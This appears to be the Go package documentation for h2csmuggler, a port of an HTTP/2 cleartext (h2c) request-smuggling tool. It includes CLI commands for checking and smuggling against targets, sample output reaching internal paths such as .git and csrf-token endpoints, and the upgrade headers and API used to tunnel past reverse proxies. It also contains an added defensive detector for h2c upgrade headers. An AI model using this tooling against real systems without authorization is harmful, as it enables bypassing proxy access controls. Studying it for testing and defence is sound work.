h2csmuggler

Version: v0.2.0

Warning: This package is not in the latest version of its module.
Published: Mar 23, 2021 License: AGPL-3.0 Imports: 12 Imported by: 0

README

h2cSmuggler

Tl;dr

This repo implements h2csmuggler from https://github.com/BishopFox/h2csmuggler in Go.

This repo also implements a Go library for performing h2c smuggling. It was built by forking the net/http2 library and modifying the client to accept and process non-spec-compliant h2c upgrades over TLS connections. It can also handle h2c upgrades over HTTP.

Two utilities have been added to assist testing:

# check reports whether an h2c connection can be formed and whether the first request returns
go run ./cmd/h2csmuggler check https://google.com/ http://localhost

# smuggle will attempt the CLI arguments as URLs sequentially
go run ./cmd/h2csmuggler smuggle https://google.com/ https://google.com/flag

# demo will create an HTTP server that accepts non-compliant `Connection: Upgrade` connections and upgrades them to h2c for testing
go run ./cmd/demo

$ cat ~/tools/lists/rafter.txt | head -n 10 | ./h2cs mutate pitchfork http://localhost - -p api | ./h2cs smuggle http://localhost - -ojson
{"body":38,"level":"info","msg":"success","status":200,"target":"http://localhost/javsacript/main.js","time":"2020-09-16T12:43:05+10:00"}
{"body":39,"level":"info","msg":"success","status":200,"target":"http://localhost/javascripts/main.js","time":"2020-09-16T12:43:05+10:00"}
{"body":24,"level":"info","msg":"success","status":200,"target":"http://localhost/.git","time":"2020-09-16T12:43:05+10:00"}
{"body":28,"level":"info","msg":"success","status":200,"target":"http://localhost/api/_rpc","time":"2020-09-16T12:43:05+10:00"}
{"body":34,"level":"info","msg":"success","status":200,"target":"http://localhost/api/csrf-token","time":"2020-09-16T12:43:05+10:00"}
{"body":27,"level":"info","msg":"success","status":200,"target":"http://localhost/cgi-bin","time":"2020-09-16T12:43:05+10:00"}
<snip>
Author

Twitter: @seanyeoh

GitHub: minight

Original Research

Jake Miller - https://github.com/BishopFox/h2csmuggler

Documentation

Index

Constants

This section is empty.

Variables

var (
	DefaultDialer = &net.Dialer{
		Timeout: time.Millisecond * time.Duration(5000),
		Resolver: &net.Resolver{
			PreferGo: true,
			Dial: func(ctx context.Context, network, address string) (net.Conn, error) {
				d := net.Dialer{
					Timeout: time.Millisecond * time.Duration(5000),
				}
				return d.DialContext(ctx, "udp", "1.1.1.1:53")
			},
		},
	}
	DefaultTransport = &http2.Transport{
		AllowHTTP: true,
	}
)
var (
	DefaultConnectionHeader    = "Upgrade, HTTP2-Settings"
	DefaultUpgradeHeader       = "h2c"
	DefaultHTTP2SettingsHeader = "AAMAAABkAARAAAAAAAIAAAAA"
)
var (
	ErrUnexpectedScheme = errors.New("Unexpected scheme for connection")
)

Functions

func CreateConn

func CreateConn(t *url.URL, dialer *net.Dialer) (ret net.Conn, err error)

CreateConn will create a net.Conn from the URL. It chooses between a TLS and a normal TCP connection based on the URL scheme.

Types

type Conn

type Conn struct {
	// contains filtered or unexported fields
}

Conn encapsulates all the state needed to perform a request over h2c. Internally, this is a single-threaded connection. Functions can be called concurrently; however, they will block on the same thread. For concurrent connections, multiple Conns should be instantiated. Initialization of the connection is lazily performed to allow the caller to customise the request used to upgrade the connection. Instantiating a Conn should be done via Client.

func NewConn

func NewConn(target string, opts ...ConnectionOption) (*Conn, error)

NewConn will return an uninitialized h2csmuggler connection. The first call to Do will initialize the connection and perform the upgrade. Target must be a parsable URL including the protocol, e.g. https://google.com. Path and port will be inferred if not provided (443 for https and 80 for http). Initialization of the connection is lazily performed to allow the caller to customise the request used to upgrade the connection.

func (*Conn) Close

func (c *Conn) Close()

Close will close the underlying connections. After this is called, the struct is no longer safe to use

func (*Conn) Do

func (c *Conn) Do(req *http.Request) (*http.Response, error)

func (*Conn) DoUpgrade

func (c *Conn) DoUpgrade(req *http.Request, opts ...UpgradeOption) (*http.Response, error)

DoUpgrade will perform the request and upgrade the connection to HTTP/2 (h2c). DoUpgrade can only be successfully called once. If called a second time, it will return an error. If a call is unsuccessful, it can be called again; however, it is likely the same connection error will be returned (e.g. timeout, HTTP2 not supported, etc.). The provided request will have the following headers added to ensure the upgrade occurs:

Upgrade: h2c
HTTP2-Settings: AAMAAABkAARAAAAAAAIAAAAA
Connection: Upgrade

These can be modified with the upgrade options; however, this may result in an unsuccessful connection.

TODO: make this threadsafe.
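For defenders, the upgrade headers documented above are the signal to look for at a proxy or origin. The following is an added example, not part of the h2csmuggler package: it decodes the default HTTP2-Settings value and checks request headers for an h2c upgrade attempt. The names Setting, DecodeHTTP2Settings and IsH2CUpgrade are hypothetical, and the sample headers in main are constructed.

```go
package main

import (
	"encoding/base64"
	"encoding/binary"
	"fmt"
	"net/http"
	"strings"
)

// Setting is one 6-byte entry of an HTTP/2 SETTINGS payload (RFC 7540, section 6.5.1).
type Setting struct {
	ID    uint16
	Value uint32
}

// DecodeHTTP2Settings decodes the unpadded base64url SETTINGS payload (RFC 7540, section 3.2.1).
func DecodeHTTP2Settings(v string) ([]Setting, error) {
	raw, err := base64.RawURLEncoding.DecodeString(v)
	if err != nil {
		return nil, err
	}
	if len(raw)%6 != 0 {
		return nil, fmt.Errorf("payload length %d is not a multiple of 6", len(raw))
	}
	var out []Setting
	for i := 0; i < len(raw); i += 6 {
		out = append(out, Setting{binary.BigEndian.Uint16(raw[i:]), binary.BigEndian.Uint32(raw[i+2:])})
	}
	return out, nil
}

// IsH2CUpgrade reports whether request headers ask for an h2c upgrade.
func IsH2CUpgrade(h http.Header) bool {
	for _, v := range h.Values("Upgrade") {
		for _, tok := range strings.Split(v, ",") {
			if strings.EqualFold(strings.TrimSpace(tok), "h2c") {
				return true
			}
		}
	}
	return len(h.Values("HTTP2-Settings")) > 0 // either header alone counts: a client can alter or drop each one
}

func main() {
	// Constructed sample headers carrying the package defaults (keys in Go's canonical form).
	h := http.Header{"Upgrade": {"h2c"}, "Http2-Settings": {"AAMAAABkAARAAAAAAAIAAAAA"}}
	s, err := DecodeHTTP2Settings(h.Get("HTTP2-Settings"))
	fmt.Println(IsH2CUpgrade(h), s, err)
}
```

The default value decodes to three settings: MAX_CONCURRENT_STREAMS (0x3) = 100, INITIAL_WINDOW_SIZE (0x4) = 1073741824 and ENABLE_PUSH (0x2) = 0.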

func (*Conn) Initialized

func (c *Conn) Initialized() bool

Initialized will return whether this connection has been initialized already

type ConnectionOption

type ConnectionOption func(c *Conn)

func ConnectionDialer

func ConnectionDialer(t *net.Dialer) ConnectionOption

func ConnectionMaxRetries

func ConnectionMaxRetries(v int) ConnectionOption

func ConnectionTransport

func ConnectionTransport(t *http2.Transport) ConnectionOption

type UpgradeOption

type UpgradeOption func(o *UpgradeOptions)

UpgradeOption provides manipulation of the initial upgrade request

func DisableConnectionHeader

func DisableConnectionHeader(val bool) UpgradeOption

func DisableHTTP2SettingsHeader

func DisableHTTP2SettingsHeader(val bool) UpgradeOption

func DisableUpgradeHeader

func DisableUpgradeHeader(val bool) UpgradeOption

func SetConnectionHeader

func SetConnectionHeader(val string) UpgradeOption

func SetHTTP2SettingsHeader

func SetHTTP2SettingsHeader(val string) UpgradeOption

func SetUpgradeHeader

func SetUpgradeHeader(val string) UpgradeOption

type UpgradeOptions

type UpgradeOptions struct {
	ConnectionHeader    string
	HTTP2SettingsHeader string
	UpgradeHeader       string

	ConnectionHeaderDisabled    bool
	HTTP2SettingsHeaderDisabled bool
	UpgradeHeaderDisabled       bool
}

UpgradeOptions provides manual overrides for the specific headers needed to upgrade the connection to h2c. Fiddling with these may result in an unsuccessful connection.

Directories

Path Synopsis
cmd
Package http2 implements the HTTP/2 protocol.
h2c
Package h2c implements the unencrypted "h2c" form of HTTP/2.
h2i
The h2i command is an interactive HTTP/2 console.
hpack
Package hpack implements HPACK, a compression format for efficiently representing HTTP header fields in the context of HTTP/2.
pkg
